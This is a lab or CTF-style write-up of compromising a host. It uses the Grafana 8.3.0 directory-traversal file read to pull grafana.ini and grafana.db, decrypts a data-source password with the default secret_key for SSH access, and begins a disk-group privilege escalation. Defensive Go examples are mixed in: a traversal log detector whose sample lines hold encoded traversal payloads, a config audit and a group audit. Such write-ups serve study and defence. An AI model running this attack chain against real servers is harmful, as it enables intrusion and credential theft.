$ nmap -p- --min-rate 3000 -Pn 192.168.208.181
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-21 16:49 +08
Warning: 192.168.208.181 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.208.181
Host is up (0.18s latency).
Not shown: 65412 closed tcp ports (conn-refused), 121 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Grafana LFI + Decrypt Password -> SSH Creds
Port 3000 was running Grafana:
This particular version (8.3.0) had a public directory traversal / arbitrary file read (LFI) exploit:
$ searchsploit grafana 8.3.0
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Grafana 8.3.0 - Directory Traversal and Arbitrary File Rea | multiple/webapps/50581.py
----------------------------------------------------------- ---------------------------------
I verified that it works:
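From the defender's side, this class of exploit leaves an obvious trace: a request path containing a `..` segment, usually percent-encoded one or more times. The Go program below is an added example (it is not the exploit from the page and not Grafana's code); it parses combined-format access-log lines such as a reverse proxy in front of Grafana would write, normalises the request path by repeated decoding, and flags traversal attempts. The log lines and client addresses are constructed for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// accessLogLine matches the request portion of a combined-format access log
// line: client IP, timestamp, method, path and status code.
var accessLogLine = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})`)

// Finding describes one request that looks like a traversal attempt.
type Finding struct {
	Client  string
	Time    string
	Path    string // path exactly as logged
	Decoded string // path after percent-decoding
	Status  string
}

// decodeRepeatedly percent-decodes until the string stops changing, so that
// single- and double-encoded sequences (%2e%2e%2f, %252e) are both normalised.
func decodeRepeatedly(s string) string {
	for i := 0; i < 3; i++ {
		d, err := url.PathUnescape(s)
		if err != nil || d == s {
			return s
		}
		s = d
	}
	return s
}

// isTraversal reports whether a decoded request path contains a ".." segment,
// which no legitimate Grafana client sends.
func isTraversal(decoded string) bool {
	for _, seg := range strings.FieldsFunc(decoded, func(r rune) bool { return r == '/' || r == '\\' }) {
		if seg == ".." {
			return true
		}
	}
	return false
}

// ScanAccessLog parses access-log text and returns the requests whose path
// contains a traversal sequence.
func ScanAccessLog(logText string) []Finding {
	var out []Finding
	for _, line := range strings.Split(logText, "\n") {
		m := accessLogLine.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		decoded := decodeRepeatedly(m[4])
		if isTraversal(decoded) {
			out = append(out, Finding{Client: m[1], Time: m[2], Path: m[4], Decoded: decoded, Status: m[5]})
		}
	}
	return out
}

// sampleLog is constructed for this example; it is not a capture from the target.
const sampleLog = `10.10.14.7 - - [21/Jul/2023:16:55:10 +0800] "GET /login HTTP/1.1" 200 31204
10.10.14.7 - - [21/Jul/2023:16:55:12 +0800] "GET /public/img/grafana_icon.svg HTTP/1.1" 200 2900
10.10.14.7 - - [21/Jul/2023:16:56:03 +0800] "GET /public/../../../../../../etc/grafana/grafana.ini HTTP/1.1" 200 41321
10.10.14.7 - - [21/Jul/2023:16:56:40 +0800] "GET /public/..%2f..%2f..%2f..%2fvar%2flib%2fgrafana%2fgrafana.db HTTP/1.1" 200 1052672
10.10.14.9 - - [21/Jul/2023:16:57:01 +0800] "GET /api/dashboards/home HTTP/1.1" 401 27`

func main() {
	for _, f := range ScanAccessLog(sampleLog) {
		fmt.Printf("%s %s %s -> %s (HTTP %s)\n", f.Time, f.Client, f.Path, f.Decoded, f.Status)
	}
}
```

The decode step matters more than the pattern: a rule that only looks for the literal string `../` misses the encoded variant in the fourth line, which is the form exploit scripts actually send.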
Since we don't have Grafana credentials, let's use the file read to fetch the Grafana configuration file at /etc/grafana/grafana.ini. I found this within it:
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
;admin_password = admin
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
# Path to where grafana can store temp files, sessions, and the sqlite3 db (if that is used)
;data = /var/lib/grafana
# For "sqlite3" only, path relative to data_path setting
;path = grafana.db
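Two of the values above are dangerous precisely because they are commented out: Grafana then falls back to its shipped defaults, and the default secret_key is public. As an added example (not from the page and not Grafana's own code), here is a small Go audit that parses a grafana.ini and reports secrets still at their defaults. The first sample is the excerpt read from the target above; the hardened sample and its key value are constructed for comparison.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// grafanaDefaultSecretKey is the value Grafana ships in its sample
// configuration; it is the same value shown commented out above.
const grafanaDefaultSecretKey = "SW2YcwTIb9zpOOhoPsMm"

// parseIni returns the explicitly set keys of a Grafana-style INI file.
// Lines beginning with ';' or '#' are comments, so a commented-out key is
// absent from the map and Grafana's built-in default applies. Keys are
// recorded without their section; the keys audited here have unique names.
func parseIni(text string) map[string]string {
	set := map[string]string{}
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" || line[0] == ';' || line[0] == '#' || line[0] == '[' {
			continue
		}
		k, v, ok := strings.Cut(line, "=")
		if !ok {
			continue
		}
		set[strings.TrimSpace(k)] = strings.TrimSpace(v)
	}
	return set
}

// AuditGrafanaIni reports settings that leave Grafana's secrets at their
// shipped defaults: anyone who can read the config, or who simply knows the
// defaults, can then decrypt stored data-source passwords or log in as admin.
func AuditGrafanaIni(text string) []string {
	set := parseIni(text)
	var findings []string
	switch key, ok := set["secret_key"]; {
	case !ok:
		findings = append(findings, "secret_key is not set: the shipped default applies, so every encrypted data-source password can be decrypted by anyone who knows it")
	case key == grafanaDefaultSecretKey:
		findings = append(findings, "secret_key is the shipped default value; rotate it")
	case len(key) < 16:
		findings = append(findings, "secret_key is shorter than 16 characters")
	}
	if pw, ok := set["admin_password"]; !ok || pw == "admin" {
		findings = append(findings, "admin_password is not overridden: unless it was changed in the UI, the default 'admin' still works")
	}
	return findings
}

// sampleIni reproduces the excerpt read from the target above.
const sampleIni = `[security]
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
;admin_password = admin
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
`

// hardenedIni is constructed: the key and password are made-up values.
const hardenedIni = `[security]
admin_user = admin
admin_password = constructed-strong-admin-password
secret_key = 3f9c1e7b2a8d4c6e9f0b1a2c3d4e5f6a
`

func main() {
	for name, ini := range map[string]string{"target": sampleIni, "hardened": hardenedIni} {
		fmt.Printf("%s: %d finding(s)\n", name, len(AuditGrafanaIni(ini)))
		for _, f := range AuditGrafanaIni(ini) {
			fmt.Println("  -", f)
		}
	}
}
```

The audit deliberately treats an absent secret_key the same as the default one, because that is what Grafana does at runtime.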
We can attempt to read the Grafana SQLite database from that folder (data path plus database path from the config above, i.e. /var/lib/grafana/grafana.db). I copied the output to a file, and checked for instances of admin:
This was an encrypted data source password, stored base64-encoded. Googling how to decrypt this led me to another GitHub repository:
To abuse this, replace the secret key and encrypted password within the script:
var grafanaIni_secretKey = "SW2YcwTIb9zpOOhoPsMm"
var dataSourcePassword = "anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w=="
Afterwards, make sure that the golang.org/x/crypto/pbkdf2@latest module is installed for go. Running the script then decrypts the password:
With the password, I tested Grafana and SSH, and it worked for the sysadmin user:
Privilege Escalation
Disk Group -> Read SSH Key
We are part of the disk group, which gives raw access to the block devices and therefore, through debugfs, to the entire file system regardless of permissions. First, let's check the different devices available:
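Membership in disk is one of a handful of group memberships that are root-equivalent, and it is easy to miss in a review because nothing about it looks like sudo. The Go audit below is an added example (not from the page); it parses /etc/group text and lists every non-root member of such a group. The sample group file is constructed and is not the target's.

```go
package main

import (
	"fmt"
	"strings"
)

// privilegedGroups are groups whose membership is effectively root. The
// descriptions are the reason each one matters.
var privilegedGroups = map[string]string{
	"disk":   "raw read/write access to block devices (debugfs, dd)",
	"docker": "can start a container with the host file system mounted",
	"lxd":    "can start a privileged container",
	"sudo":   "sudo rights",
	"wheel":  "sudo rights",
	"shadow": "can read password hashes",
}

// GroupFinding records one user holding a privileged group membership.
type GroupFinding struct {
	Group  string
	Member string
	Why    string
}

// AuditGroups parses /etc/group text (name:password:gid:members) and returns
// every non-root user listed as a member of a privileged group. Primary group
// membership set in /etc/passwd is not covered here.
func AuditGroups(groupFile string) []GroupFinding {
	var out []GroupFinding
	for _, line := range strings.Split(groupFile, "\n") {
		fields := strings.Split(line, ":")
		if len(fields) != 4 {
			continue
		}
		why, ok := privilegedGroups[fields[0]]
		if !ok || fields[3] == "" {
			continue
		}
		for _, m := range strings.Split(fields[3], ",") {
			if m != "" && m != "root" {
				out = append(out, GroupFinding{Group: fields[0], Member: m, Why: why})
			}
		}
	}
	return out
}

// sampleGroupFile is constructed for this example.
const sampleGroupFile = `root:x:0:
adm:x:4:syslog,sysadmin
disk:x:6:sysadmin
sudo:x:27:
users:x:100:sysadmin,deploy
docker:x:998:deploy
`

func main() {
	for _, f := range AuditGroups(sampleGroupFile) {
		fmt.Printf("%-8s %-10s %s\n", f.Group, f.Member, f.Why)
	}
}
```

On a real host, feed it the contents of /etc/group (or `getent group` output) and treat every line it prints as equivalent to an entry in sudoers.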